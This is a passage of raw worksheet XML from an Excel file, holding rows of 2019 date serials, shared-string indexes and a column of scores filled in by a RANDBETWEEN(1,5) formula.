        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2587" s="1">
        <v>43509.746354166666</v>
      </c>
      <c r="B2587" t="s">
        <v>13</v>
      </c>
      <c r="C2587" t="s">
        <v>10</v>
      </c>
      <c r="D2587" t="s">
        <v>6</v>
      </c>
      <c r="E2587" t="s">
        <v>2533</v>
      </c>
      <c r="F2587">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2588" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2588" s="1">
        <v>43509.745069444441</v>
      </c>
      <c r="B2588" t="s">
        <v>19</v>
      </c>
      <c r="C2588" t="s">
        <v>10</v>
      </c>
      <c r="D2588" t="s">
        <v>107</v>
      </c>
      <c r="E2588" s="2" t="s">
        <v>2534</v>
      </c>
      <c r="F2588">
        <f t="shared" ca="1" si="40"/>
        <v>5</v>
      </c>
    </row>
    <row r="2589" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2589" s="1">
        <v>43509.734444444446</v>
      </c>
      <c r="B2589" t="s">
        <v>5</v>
      </c>
      <c r="C2589" t="s">
        <v>10</v>
      </c>
      <c r="D2589" t="s">
        <v>94</v>
      </c>
      <c r="E2589" t="s">
        <v>2535</v>
      </c>
      <c r="F2589">
        <f t="shared" ca="1" si="40"/>
        <v>5</v>
      </c>
    </row>
    <row r="2590" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2590" s="1">
        <v>43509.719421296293</v>
      </c>
      <c r="B2590" t="s">
        <v>13</v>
      </c>
      <c r="C2590" t="s">
        <v>10</v>
      </c>
      <c r="D2590" t="s">
        <v>46</v>
      </c>
      <c r="E2590" s="2" t="s">
        <v>2536</v>
      </c>
      <c r="F2590">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2591" s="1">
        <v>43509.708391203705</v>
      </c>
      <c r="B2591" t="s">
        <v>5</v>
      </c>
      <c r="C2591" t="s">
        <v>10</v>
      </c>
      <c r="D2591" t="s">
        <v>89</v>
      </c>
      <c r="E2591" t="s">
        <v>2537</v>
      </c>
      <c r="F2591">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2592" s="1">
        <v>43509.702488425923</v>
      </c>
      <c r="B2592" t="s">
        <v>5</v>
      </c>
      <c r="C2592" t="s">
        <v>10</v>
      </c>
      <c r="D2592" t="s">
        <v>17</v>
      </c>
      <c r="E2592" t="s">
        <v>2538</v>
      </c>
      <c r="F2592">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2593" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2593" s="1">
        <v>43509.688993055555</v>
      </c>
      <c r="B2593" t="s">
        <v>19</v>
      </c>
      <c r="C2593" t="s">
        <v>41</v>
      </c>
      <c r="E2593" s="2" t="s">
        <v>2539</v>
      </c>
      <c r="F2593">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2594" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2594" s="1">
        <v>43509.675763888888</v>
      </c>
      <c r="B2594" t="s">
        <v>5</v>
      </c>
      <c r="C2594" t="s">
        <v>16</v>
      </c>
      <c r="E2594" s="2" t="s">
        <v>2540</v>
      </c>
      <c r="F2594">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2595" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2595" s="1">
        <v>43509.675717592596</v>
      </c>
      <c r="B2595" t="s">
        <v>5</v>
      </c>
      <c r="C2595" t="s">
        <v>10</v>
      </c>
      <c r="D2595" t="s">
        <v>112</v>
      </c>
      <c r="E2595" s="2" t="s">
        <v>2541</v>
      </c>
      <c r="F2595">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2596" s="1">
        <v>43509.672175925924</v>
      </c>
      <c r="B2596" t="s">
        <v>5</v>
      </c>
      <c r="C2596" t="s">
        <v>16</v>
      </c>
      <c r="E2596" t="s">
        <v>2542</v>
      </c>
      <c r="F2596">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2597" s="1">
        <v>43509.670081018521</v>
      </c>
      <c r="B2597" t="s">
        <v>13</v>
      </c>
      <c r="C2597" t="s">
        <v>10</v>
      </c>
      <c r="D2597" t="s">
        <v>107</v>
      </c>
      <c r="E2597" t="s">
        <v>2543</v>
      </c>
      <c r="F2597">
        <f t="shared" ca="1" si="40"/>
        <v>5</v>
      </c>
    </row>
    <row r="2598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2598" s="1">
        <v>43509.66741898148</v>
      </c>
      <c r="B2598" t="s">
        <v>13</v>
      </c>
      <c r="C2598" t="s">
        <v>10</v>
      </c>
      <c r="D2598" t="s">
        <v>163</v>
      </c>
      <c r="E2598" t="s">
        <v>2544</v>
      </c>
      <c r="F2598">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2599" s="1">
        <v>43509.656145833331</v>
      </c>
      <c r="B2599" t="s">
        <v>19</v>
      </c>
      <c r="C2599" t="s">
        <v>2545</v>
      </c>
      <c r="E2599" t="s">
        <v>2546</v>
      </c>
      <c r="F2599">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2600" s="1">
        <v>43509.655532407407</v>
      </c>
      <c r="B2600" t="s">
        <v>13</v>
      </c>
      <c r="C2600" t="s">
        <v>10</v>
      </c>
      <c r="D2600" t="s">
        <v>36</v>
      </c>
      <c r="E2600" t="s">
        <v>2547</v>
      </c>
      <c r="F2600">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2601" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2601" s="1">
        <v>43509.650219907409</v>
      </c>
      <c r="B2601" t="s">
        <v>5</v>
      </c>
      <c r="C2601" t="s">
        <v>173</v>
      </c>
      <c r="E2601" s="2" t="s">
        <v>2548</v>
      </c>
      <c r="F2601">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2602" s="1">
        <v>43509.630636574075</v>
      </c>
      <c r="B2602" t="s">
        <v>13</v>
      </c>
      <c r="C2602" t="s">
        <v>6</v>
      </c>
      <c r="D2602" t="s">
        <v>821</v>
      </c>
      <c r="E2602" t="s">
        <v>2549</v>
      </c>
      <c r="F2602">
        <f t="shared" ca="1" si="40"/>
        <v>5</v>
      </c>
    </row>
    <row r="2603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2603" s="1">
        <v>43509.62122685185</v>
      </c>
      <c r="B2603" t="s">
        <v>5</v>
      </c>
      <c r="C2603" t="s">
        <v>189</v>
      </c>
      <c r="F2603">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2604" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2604" s="1">
        <v>43509.611226851855</v>
      </c>
      <c r="B2604" t="s">
        <v>1305</v>
      </c>
      <c r="C2604" t="s">
        <v>10</v>
      </c>
      <c r="D2604" t="s">
        <v>163</v>
      </c>
      <c r="E2604" s="2" t="s">
        <v>2550</v>
      </c>
      <c r="F2604">
        <f t="shared" ca="1" si="40"/>
        <v>5</v>
      </c>
    </row>
    <row r="2605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2605" s="1">
        <v>43509.59275462963</v>
      </c>
      <c r="B2605" t="s">
        <v>19</v>
      </c>
      <c r="C2605" t="s">
        <v>10</v>
      </c>
      <c r="D2605" t="s">
        <v>6</v>
      </c>
      <c r="E2605" t="s">
        <v>2551</v>
      </c>
      <c r="F2605">
        <f t="shared" ca="1" si="40"/>
        <v>5</v>
      </c>
    </row>
    <row r="2606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2606" s="1">
        <v>43509.560833333337</v>
      </c>
      <c r="B2606" t="s">
        <v>5</v>
      </c>
      <c r="C2606" t="s">
        <v>2552</v>
      </c>
      <c r="E2606" t="s">
        <v>2553</v>
      </c>
      <c r="F2606">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2607" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A2607" s="1">
        <v>43509.554201388892</v>
      </c>
      <c r="B2607" t="s">
        <v>5</v>
      </c>
      <c r="C2607" t="s">
        <v>10</v>
      </c>
      <c r="D2607" t="s">
        <v>36</v>
      </c>
      <c r="E2607" s="2" t="s">
        <v>2554</v>
      </c>
      <c r="F2607">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2608" s="1">
        <v>43509.551608796297</v>
      </c>
      <c r="B2608" t="s">
        <v>1305</v>
      </c>
      <c r="C2608" t="s">
        <v>10</v>
      </c>
      <c r="D2608" t="s">
        <v>251</v>
      </c>
      <c r="E2608" t="s">
        <v>2555</v>
      </c>
      <c r="F2608">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2609" s="1">
        <v>43509.54210648148</v>
      </c>
      <c r="B2609" t="s">
        <v>19</v>
      </c>
      <c r="C2609" t="s">
        <v>10</v>
      </c>
      <c r="D2609" t="s">
        <v>94</v>
      </c>
      <c r="E2609" t="s">
        <v>2556</v>
      </c>
      <c r="F2609">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2610" s="1">
        <v>43509.537581018521</v>
      </c>
      <c r="B2610" t="s">
        <v>13</v>
      </c>
      <c r="C2610" t="s">
        <v>48</v>
      </c>
      <c r="E2610" t="s">
        <v>2557</v>
      </c>
      <c r="F2610">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2611" s="1">
        <v>43509.533506944441</v>
      </c>
      <c r="B2611" t="s">
        <v>19</v>
      </c>
      <c r="C2611" t="s">
        <v>10</v>
      </c>
      <c r="D2611" t="s">
        <v>107</v>
      </c>
      <c r="E2611" t="s">
        <v>2558</v>
      </c>
      <c r="F2611">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2612" s="1">
        <v>43509.526921296296</v>
      </c>
      <c r="B2612" t="s">
        <v>19</v>
      </c>
      <c r="C2612" t="s">
        <v>10</v>
      </c>
      <c r="D2612" t="s">
        <v>89</v>
      </c>
      <c r="E2612" t="s">
        <v>2559</v>
      </c>
      <c r="F2612">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2613" s="1">
        <v>43509.520300925928</v>
      </c>
      <c r="B2613" t="s">
        <v>19</v>
      </c>
      <c r="C2613" t="s">
        <v>10</v>
      </c>
      <c r="D2613" t="s">
        <v>80</v>
      </c>
      <c r="E2613" t="s">
        <v>2560</v>
      </c>
      <c r="F2613">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2614" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2614" s="1">
        <v>43509.519293981481</v>
      </c>
      <c r="B2614" t="s">
        <v>13</v>
      </c>
      <c r="C2614" t="s">
        <v>1812</v>
      </c>
      <c r="E2614" s="2" t="s">
        <v>2561</v>
      </c>
      <c r="F2614">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2615" s="1">
        <v>43509.517314814817</v>
      </c>
      <c r="B2615" t="s">
        <v>5</v>
      </c>
      <c r="C2615" t="s">
        <v>10</v>
      </c>
      <c r="D2615" t="s">
        <v>178</v>
      </c>
      <c r="E2615" t="s">
        <v>2562</v>
      </c>
      <c r="F2615">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2616" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2616" s="1">
        <v>43509.508194444446</v>
      </c>
      <c r="B2616" t="s">
        <v>13</v>
      </c>
      <c r="C2616" t="s">
        <v>189</v>
      </c>
      <c r="E2616" s="2" t="s">
        <v>2563</v>
      </c>
      <c r="F2616">
        <f t="shared" ca="1" si="40"/>
        <v>3</v>
      </c>
    </row>
    <row r="2617" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2617" s="1">
        <v>43509.503263888888</v>
      </c>
      <c r="B2617" t="s">
        <v>13</v>
      </c>
      <c r="C2617" t="s">
        <v>10</v>
      </c>
      <c r="D2617" t="s">
        <v>6</v>
      </c>
      <c r="E2617" s="2" t="s">
        <v>2564</v>
      </c>
      <c r="F2617">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2618" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A2618" s="1">
        <v>43509.49622685185</v>
      </c>
      <c r="B2618" t="s">
        <v>19</v>
      </c>
      <c r="C2618" t="s">
        <v>65</v>
      </c>
      <c r="E2618" s="2" t="s">
        <v>2565</v>
      </c>
      <c r="F2618">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2619" s="1">
        <v>43509.493252314816</v>
      </c>
      <c r="B2619" t="s">
        <v>5</v>
      </c>
      <c r="C2619" t="s">
        <v>10</v>
      </c>
      <c r="D2619" t="s">
        <v>6</v>
      </c>
      <c r="E2619" t="s">
        <v>2566</v>
      </c>
      <c r="F2619">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2620" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2620" s="1">
        <v>43509.489791666667</v>
      </c>
      <c r="B2620" t="s">
        <v>19</v>
      </c>
      <c r="C2620" t="s">
        <v>6</v>
      </c>
      <c r="D2620" t="s">
        <v>602</v>
      </c>
      <c r="E2620" s="2" t="s">
        <v>2567</v>
      </c>
      <c r="F2620">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2621" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2621" s="1">
        <v>43509.488900462966</v>
      </c>
      <c r="B2621" t="s">
        <v>19</v>
      </c>
      <c r="C2621" t="s">
        <v>48</v>
      </c>
      <c r="E2621" s="2" t="s">
        <v>2568</v>
      </c>
      <c r="F2621">
        <f t="shared" ca="1" si="40"/>
        <v>1</v>
      </c>
    </row>
    <row r="2622" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2622" s="1">
        <v>43509.484583333331</v>
      </c>
      <c r="B2622" t="s">
        <v>5</v>
      </c>
      <c r="C2622" t="s">
        <v>16</v>
      </c>
      <c r="E2622" s="2" t="s">
        <v>2569</v>
      </c>
      <c r="F2622">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2623" s="1">
        <v>43509.484027777777</v>
      </c>
      <c r="B2623" t="s">
        <v>19</v>
      </c>
      <c r="C2623" t="s">
        <v>10</v>
      </c>
      <c r="D2623" t="s">
        <v>36</v>
      </c>
      <c r="E2623" t="s">
        <v>2570</v>
      </c>
      <c r="F2623">
        <f t="shared" ca="1" si="40"/>
        <v>2</v>
      </c>
    </row>
    <row r="2624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2624" s="1">
        <v>43509.477037037039</v>
      </c>
      <c r="B2624" t="s">
        <v>5</v>
      </c>
      <c r="C2624" t="s">
        <v>48</v>
      </c>
      <c r="E2624" t="s">
        <v>2571</v>
      </c>
      <c r="F2624">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2625" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A2625" s="1">
        <v>43509.470671296294</v>
      </c>
      <c r="B2625" t="s">
        <v>35</v>
      </c>
      <c r="C2625" t="s">
        <v>41</v>
      </c>
      <c r="E2625" s="2" t="s">
        <v>2572</v>
      </c>
      <c r="F2625">
        <f t="shared" ca="1" si="40"/>
        <v>4</v>
      </c>
    </row>
    <row r="2626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2626" s="1">
        <v>43509.470243055555</v>
      </c>
      <c r="B2626" t="s">
        <v>19</v>
      </c>
      <c r="C2626" t="s">
        <v>10</v>
      </c>
      <c r="D2626" t="s">
        <v>80</v>
      </c>
      <c r="E2626" t="s">
        <v>2573</v>
      </c>
      <c r="F2626">
        <f t="shared" ref="F2626:F2689" ca="1" si="41">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="2627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2627" s="1">
        <v>43509.459293981483</v>
      </c>
      <c r="B2627" t="s">
        <v>19</v>
      </c>
      <c r="C2627" t="s">
        <v>48</v>
      </c>
      <c r="E2627" t="s">
        <v>2574</v>
      </c>
      <c r="F2627">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2628" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A2628" s="1">
        <v>43509.446817129632</v>
      </c>
      <c r="B2628" t="s">
        <v>1305</v>
      </c>
      <c r="C2628" t="s">
        <v>11</v>
      </c>
      <c r="E2628" s="2" t="s">
        <v>2575</v>
      </c>
      <c r="F2628">
        <f t="shared" ca="1" si="41"/>
        <v>5</v>
      </c>
    </row>
    <row r="2629" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2629" s="1">
        <v>43509.444328703707</v>
      </c>
      <c r="B2629" t="s">
        <v>5</v>
      </c>
      <c r="C2629" t="s">
        <v>65</v>
      </c>
      <c r="E2629" s="2" t="s">
        <v>2576</v>
      </c>
      <c r="F2629">
        <f t="shared" ca="1" si="41"/>
        <v>1</v>
      </c>
    </row>
    <row r="2630" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2630" s="1">
        <v>43509.443865740737</v>
      </c>
      <c r="B2630" t="s">
        <v>5</v>
      </c>
      <c r="C2630" t="s">
        <v>559</v>
      </c>
      <c r="E2630" s="2" t="s">
        <v>2577</v>
      </c>
      <c r="F2630">
        <f t="shared" ca="1" si="41"/>
        <v>3</v>
      </c>
    </row>
    <row r="2631" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2631" s="1">
        <v>43509.431666666664</v>
      </c>
      <c r="B2631" t="s">
        <v>1305</v>
      </c>
      <c r="C2631" t="s">
        <v>65</v>
      </c>
      <c r="E2631" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="F2631">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2632" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A2632" s="1">
        <v>43509.422476851854</v>
      </c>
      <c r="B2632" t="s">
        <v>19</v>
      </c>
      <c r="C2632" t="s">
        <v>10</v>
      </c>
      <c r="E2632" s="2" t="s">
        <v>2580</v>
      </c>
      <c r="F2632">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2633" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A2633" s="1">
        <v>43509.411979166667</v>
      </c>
      <c r="B2633" t="s">
        <v>13</v>
      </c>
      <c r="C2633" t="s">
        <v>10</v>
      </c>
      <c r="D2633" t="s">
        <v>39</v>
      </c>
      <c r="E2633" s="2" t="s">
        <v>2581</v>
      </c>
      <c r="F2633">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2634" s="1">
        <v>43509.409583333334</v>
      </c>
      <c r="B2634" t="s">
        <v>1305</v>
      </c>
      <c r="C2634" t="s">
        <v>41</v>
      </c>
      <c r="E2634" t="s">
        <v>2582</v>
      </c>
      <c r="F2634">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2635" s="1">
        <v>43509.401608796295</v>
      </c>
      <c r="B2635" t="s">
        <v>13</v>
      </c>
      <c r="C2635" t="s">
        <v>10</v>
      </c>
      <c r="D2635" t="s">
        <v>56</v>
      </c>
      <c r="E2635" t="s">
        <v>2583</v>
      </c>
      <c r="F2635">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2636" s="1">
        <v>43509.401585648149</v>
      </c>
      <c r="B2636" t="s">
        <v>5</v>
      </c>
      <c r="C2636" t="s">
        <v>65</v>
      </c>
      <c r="E2636" t="s">
        <v>2584</v>
      </c>
      <c r="F2636">
        <f t="shared" ca="1" si="41"/>
        <v>1</v>
      </c>
    </row>
    <row r="2637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2637" s="1">
        <v>43509.401574074072</v>
      </c>
      <c r="B2637" t="s">
        <v>5</v>
      </c>
      <c r="C2637" t="s">
        <v>65</v>
      </c>
      <c r="E2637" t="s">
        <v>2584</v>
      </c>
      <c r="F2637">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2638" s="1">
        <v>43509.397881944446</v>
      </c>
      <c r="B2638" t="s">
        <v>1305</v>
      </c>
      <c r="C2638" t="s">
        <v>10</v>
      </c>
      <c r="D2638" t="s">
        <v>36</v>
      </c>
      <c r="E2638" t="s">
        <v>2585</v>
      </c>
      <c r="F2638">
        <f t="shared" ca="1" si="41"/>
        <v>2</v>
      </c>
    </row>
    <row r="2639" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2639" s="1">
        <v>43509.384375000001</v>
      </c>
      <c r="B2639" t="s">
        <v>35</v>
      </c>
      <c r="C2639" t="s">
        <v>71</v>
      </c>
      <c r="E2639" s="2" t="s">
        <v>2586</v>
      </c>
      <c r="F2639">
        <f t="shared" ca="1" si="41"/>
        <v>2</v>
      </c>
    </row>
    <row r="2640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2640" s="1">
        <v>43509.37767361111</v>
      </c>
      <c r="B2640" t="s">
        <v>5</v>
      </c>
      <c r="C2640" t="s">
        <v>48</v>
      </c>
      <c r="E2640" t="s">
        <v>2587</v>
      </c>
      <c r="F2640">
        <f t="shared" ca="1" si="41"/>
        <v>2</v>
      </c>
    </row>
    <row r="2641" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2641" s="1">
        <v>43509.371886574074</v>
      </c>
      <c r="B2641" t="s">
        <v>19</v>
      </c>
      <c r="C2641" t="s">
        <v>60</v>
      </c>
      <c r="E2641" s="2" t="s">
        <v>2588</v>
      </c>
      <c r="F2641">
        <f t="shared" ca="1" si="41"/>
        <v>2</v>
      </c>
    </row>
    <row r="2642" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2642" s="1">
        <v>43509.361689814818</v>
      </c>
      <c r="B2642" t="s">
        <v>19</v>
      </c>
      <c r="C2642" t="s">
        <v>65</v>
      </c>
      <c r="E2642" s="2" t="s">
        <v>2589</v>
      </c>
      <c r="F2642">
        <f t="shared" ca="1" si="41"/>
        <v>3</v>
      </c>
    </row>
    <row r="2643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2643" s="1">
        <v>43509.359594907408</v>
      </c>
      <c r="B2643" t="s">
        <v>13</v>
      </c>
      <c r="C2643" t="s">
        <v>430</v>
      </c>
      <c r="E2643" t="s">
        <v>2590</v>
      </c>
      <c r="F2643">
        <f t="shared" ca="1" si="41"/>
        <v>5</v>
      </c>
    </row>
    <row r="2644" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2644" s="1">
        <v>43509.334120370368</v>
      </c>
      <c r="B2644" t="s">
        <v>5</v>
      </c>
      <c r="C2644" t="s">
        <v>71</v>
      </c>
      <c r="E2644" s="2" t="s">
        <v>2591</v>
      </c>
      <c r="F2644">
        <f t="shared" ca="1" si="41"/>
        <v>3</v>
      </c>
    </row>
    <row r="2645" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2645" s="1">
        <v>43509.307303240741</v>
      </c>
      <c r="B2645" t="s">
        <v>19</v>
      </c>
      <c r="C2645" t="s">
        <v>10</v>
      </c>
      <c r="D2645" t="s">
        <v>89</v>
      </c>
      <c r="E2645" t="s">
        <v>2592</v>
      </c>
      <c r="F2645">
        <f t="shared" ca="1" si="41"/>
        <v>5</v>
      </c>
    </row>
    <row r="2646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2646" s="1">
        <v>43509.303530092591</v>
      </c>
      <c r="B2646" t="s">
        <v>19</v>
      </c>
      <c r="C2646" t="s">
        <v>339</v>
      </c>
      <c r="F2646">
        <f t="shared" ca="1" si="41"/>
        <v>1</v>
      </c>
    </row>
    <row r="2647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2647" s="1">
        <v>43509.303518518522</v>
      </c>
      <c r="B2647" t="s">
        <v>19</v>
      </c>
      <c r="C2647" t="s">
        <v>339</v>
      </c>
      <c r="F2647">
        <f t="shared" ca="1" si="41"/>
        <v>3</v>
      </c>
    </row>
    <row r="2648" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2648" s="1">
        <v>43509.299155092594</v>
      </c>
      <c r="B2648" t="s">
        <v>5</v>
      </c>
      <c r="C2648" t="s">
        <v>48</v>
      </c>
      <c r="E2648" s="2" t="s">
        <v>2593</v>
      </c>
      <c r="F2648">
        <f t="shared" ca="1" si="41"/>
        <v>2</v>
      </c>
    </row>
    <row r="2649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2649" s="1">
        <v>43509.289548611108</v>
      </c>
      <c r="B2649" t="s">
        <v>19</v>
      </c>
      <c r="C2649" t="s">
        <v>48</v>
      </c>
      <c r="E2649" t="s">
        <v>2594</v>
      </c>
      <c r="F2649">
        <f t="shared" ca="1" si="41"/>
        <v>1</v>
      </c>
    </row>
    <row r="2650" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A2650" s="1">
        <v>43509.259317129632</v>
      </c>
      <c r="B2650" t="s">
        <v>19</v>
      </c>
      <c r="C2650" t="s">
        <v>41</v>
      </c>
      <c r="E2650" s="2" t="s">
        <v>2595</v>
      </c>
      <c r="F2650">
        <f t="shared" ca="1" si="41"/>
        <v>1</v>
      </c>
    </row>
    <row r="2651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2651" s="1">
        <v>43509.228958333333</v>
      </c>
      <c r="B2651" t="s">
        <v>19</v>
      </c>
      <c r="C2651" t="s">
        <v>71</v>
      </c>
      <c r="E2651" t="s">
        <v>2596</v>
      </c>
      <c r="F2651">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2652" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2652" s="1">
        <v>43509.215370370373</v>
      </c>
      <c r="B2652" t="s">
        <v>5</v>
      </c>
      <c r="C2652" t="s">
        <v>48</v>
      </c>
      <c r="E2652" s="2" t="s">
        <v>2597</v>
      </c>
      <c r="F2652">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2653" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2653" s="1">
        <v>43509.203321759262</v>
      </c>
      <c r="B2653" t="s">
        <v>13</v>
      </c>
      <c r="C2653" t="s">
        <v>10</v>
      </c>
      <c r="D2653" t="s">
        <v>20</v>
      </c>
      <c r="E2653" s="2" t="s">
        <v>2598</v>
      </c>
      <c r="F2653">
        <f t="shared" ca="1" si="41"/>
        <v>4</v>
      </c>
    </row>
    <row r="2654" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2654" s="1">
        <v>43509.196458333332</v>
      </c>
      <c r="B2654" t="s">
        <v>19</v>
      </c>
      <c r="C2654" t="s">
        <v>10</v>
      </c>
      <c r="D2654" t="s">
        <v>6</v>
      </c>
      <c r="E2654" s="2" t="s">
        <v>2599</v>
      </c>
      <c r="F2654">
        <f t="shared" ca="1" si="41"/>
        <v>3</v>
      </c>
    </row>
    <row r="2655" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2655" s="1">
        <v>43509.191840277781</v>
      </c>
      <c r="B2655" t="s">
        <v>13</v>
      </c>
      <c r="C2655" t="s">
        <v>48</v>
      </c>
      <c r="E2655" s="2" t="s">
        <v>2600</v>
      </c>
      <c r="F2655">
        <f t="shared" ca="1" si="41"/>
        <v>2</v>
      </c>
    </row>
    <row r="2656" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A2656" s="1">
        <v>43509.182002314818</v>
      </c>
      <c r="B2656" t="s">
        <v>13</v>
      </c>
      <c r="C2656" t="s">
        <v>124</v>
